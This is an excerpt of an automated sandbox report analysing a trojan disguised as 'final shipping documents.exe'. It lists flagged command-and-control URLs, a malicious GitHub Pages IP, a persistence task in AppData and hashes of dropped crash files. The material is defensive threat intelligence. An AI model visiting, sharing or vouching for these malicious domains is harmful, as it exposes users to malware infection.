http://www.5970.pizza/a03d/www.eepvid.xyz	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.romatografia.online/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.1fuli9902.shop	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ome-renovation-86342.bond	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ome-renovation-86342.bond/a03d/www.ategorie-polecane-831.buzz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.elnqdjc.shop	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ings-hu-13.today/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kkkk.shop/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alata.xyz/a03d/www.enelog.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.eepvid.xyz/a03d/www.alata.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.agfov4u.xyz/a03d/www.leurdivin.online	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alata.xyzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leurdivin.online	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.encortex.beauty/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000002.2465635180.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1505638874.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.000000000919F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.voyagu.info	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.voyagu.info/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.pollensense.com/	explorer.exe, 0000000A.00000002.2462603390.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lsaadmart.storeReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yselection.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/U	explorer.exe, 0000001A.00000002.3123251512.00000000092D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.00000000092D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.otelhafnia.infoReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mmarketing.xyzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haoyun.websiteReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.otelhafnia.info/a03d/www.kkkk.shop	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oonlightshadow.shop	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000A.00000002.2464934509.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1504268919.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.2464899770.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.agfov4u.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duxrib.xyz/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ings-hu-13.today/a03d/www.agfov4u.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.atidiri.fun/a03d/www.elnqdjc.shop	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.leurdivin.online/a03d/www.romatografia.online	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.108.153	haoyunforever.github.io	Netherlands		54113	FASTLYUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590890
Start date and time:	2025-01-14 16:36:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	final shipping documents.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@967/22@4/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 112 Number of non-executed functions: 347
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, VSSVC.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 199.232.214.172, 13.95.31.18, 20.3.187.198, 40.126.32.134, 40.126.32.133, 40.126.32.68, 20.190.160.14, 40.126.32.74, 20.190.160.17, 20.190.160.20, 40.126.32.76, 204.79.197.203, 2.23.227.215, 2.23.227.208, 2.21.65.132, 2.21.65.154
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, r.bing.com, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, api-msn-com.a-0003.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:37:58	API Interceptor	1x Sleep call for process: final shipping documents.exe modified
10:38:00	API Interceptor	34x Sleep call for process: powershell.exe modified
10:38:05	API Interceptor	1x Sleep call for process: GcrdXwPgmZ.exe modified
10:38:17	API Interceptor	329934x Sleep call for process: explorer.exe modified
10:38:47	API Interceptor	1224238x Sleep call for process: mstsc.exe modified
16:38:02	Task Scheduler	Run new task: GcrdXwPgmZ path: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.108.153	http://edmilson5631.github.io/black-instagram-page	Get hash	malicious	HTMLPhisher	Browse	edmilson5631.github.io/black-instagram-page
	http://rahimlak.github.io/instagram	Get hash	malicious	HTMLPhisher	Browse	rahimlak.github.io/instagram
	http://jinos1.github.io/instgram_login	Get hash	malicious	HTMLPhisher	Browse	jinos1.github.io/instgram_login
	http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	www.pku-cs-cjw.top/k3hn/
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.pku-cs-cjw.top/o8v1/
	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	threejs.org/examples/js/libs/stats.min.js
	upx_rufus.exe	Get hash	malicious	Unknown	Browse	rufus.akeo.ie/Rufus_win.ver
	http://ikergalindez.github.io/gofish/	Get hash	malicious	HTMLPhisher	Browse	ikergalindez.github.io/gofish/
	http://hassan6077224.github.io/netflixclonetechtitans	Get hash	malicious	HTMLPhisher	Browse	hassan6077224.github.io/netflixclonetechtitans

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	0dsIoO7xjt.docx	Get hash	malicious	Unknown	Browse	199.232.210.172
	original.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	original.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	Mbda Us.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	T710XblGiM.docm	Get hash	malicious	Unknown	Browse	199.232.210.172
	T710XblGiM.docm	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://biomed.acemlna.com/lt.php?x=3TZy~GE4J6XM5p79_du5VOds1H_TjdEjvPthjaTKJ3DP65RA_ky.0.Rv2Y2liNA~j-xAXHXFJFQNDb.y_ELGV.Fw3Hyoi8	Get hash	malicious	Unknown	Browse	199.232.210.172
	P-04071A.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	P-04071A.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	hJ1bl8p7dJ.exe	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	meth1.elf	Get hash	malicious	Mirai	Browse	104.156.89.47
	Subscription_Renewal_Receipt_2025.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://2ol.itectaxice.ru/Qm75/	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zip	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zip	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://bankersonline.emlnk1.com/lt.php?x=3DZy~GDKVXafEpOq0AE4hRad~XEkk_HzluhlXXTGVXjNDHz~_Uy.0eht1H_zk_D2kvY3bHHJJ3ab62	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_55419b33-5f58-473e-8682-682cae9ed9c9\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.343921651167168
Encrypted:	false
SSDEEP:	384:KXoCmLgHqjjw6GV3RCR0CPMfYzuiF5Y4lO8k:KXovgHqjjyVhw0QMgzuiF5Y4lO8
MD5:	E2A863E699A2E3A94366A798A296DB5B
SHA1:	2F8B0DB7D32BBB84C6B0794CFEC7DD00E914B88E
SHA-256:	B917D361C7CDE9472013BCB42EAD2D03C2787F1BEB7C036404220EBFB1B2DD24
SHA-512:	5904B5369803B634E1D4156D399AF202184E14127D140480E6DD241E95AE150F5CD79FE61F36224F9A24D056F613385C291B645BFBCF8E9B4BBD3BB641BE193D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.4.2.7.7.6.2.5.3.7.5.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.4.1.9.b.3.3.-.5.f.5.8.-.4.7.3.e.-.8.6.8.2.-.6.8.2.c.a.e.9.e.d.9.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.b.c.9.c.3.1.-.9.6.e.0.-.4.b.9.a.-.b.5.b.d.-.4.0.3.1.2.0.9.3.f.2.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.d.8.-.0.0.0.1.-.0.0.1.4.-.a.1.f.2.-.8.d.f.a.8.d.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2914.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, Tue Jan 14 15:39:39 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	1064038
Entropy (8bit):	1.3958946471876321
Encrypted:	false
SSDEEP:	3072:BXqDrpY2OBU2L7nDVKiqnnL5pyk0BtEIzjQvS:B6Dr4BV3nDVKi8nLT30Bqvq
MD5:	F72A8058F1A3309CE73480B031043531
SHA1:	7575CAD7D44999782960E99E970DF8C65CB0765D
SHA-256:	872E050BF66EAB54C5137FC21EEF75288C02770D274873A9E30C9F2351C8C3CD
SHA-512:	7557130A9095C2A4CC2801492DCA3C99188C6567DCB8908512655FB38CB8713A548993F86EF4A681201814A340D7DB33381B4324721C1413746773DCCE9A72FA
Malicious:	false
Preview:	MDMP..a..... .......;..g................ ....... n..................................................x.......8...........T...$.......pb.....................................L...............................................................................eJ......h.......Lw......................T.........../p.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER34CD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10858
Entropy (8bit):	3.7025981171622524
Encrypted:	false
SSDEEP:	192:R6l7wVeJdO3e6YsaigmfqzVEUwprU89bvZEAHNf0RFm:R6lXJkO6YxigmfqzVmvaAHNf0K
MD5:	70351169037E110E2322458971AB7D64
SHA1:	EFB08619A5EAF99EDC5EF90436753318FC1CA349
SHA-256:	AA211134E49CEB5DAB59DB08A947DC18E3BC686CEBCFDBC74D9B2AC7E23BEAEC
SHA-512:	2E6A5137847792913D1EA6FF7D420E296228115995FA71217AB3688E2FA657364EBD7279D35F8DB0C21B90C02B7FBA24DF46E1112ED01D0EE83BAA340DEB6850
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER350D.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.4637838471586075
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg771I9WkkWpW8VYVdMPYm8M4JYmF8jFWyq85cbb9Q32d:uIjfTI7Y97VGMSJEFWxba32d
MD5:	95951AA8121953E7B6BE644206573918
SHA1:	EC51ABFF78DCB74045E7F6275E1600A62C68EC01
SHA-256:	9A62E55F9DEFED6F43FBC469E90D191C9BE603F697C71FE4CB5E749DDCDCC68F
SHA-512:	6BF7C84920B513C347CD26CA00A476CFC43FD9350F9B680E3AF98D786F11F7C92DE016039598D910DFB6A134A16FAC3C9F0F54041D441A2CC2E910C8D61A5E22
Malicious:	false
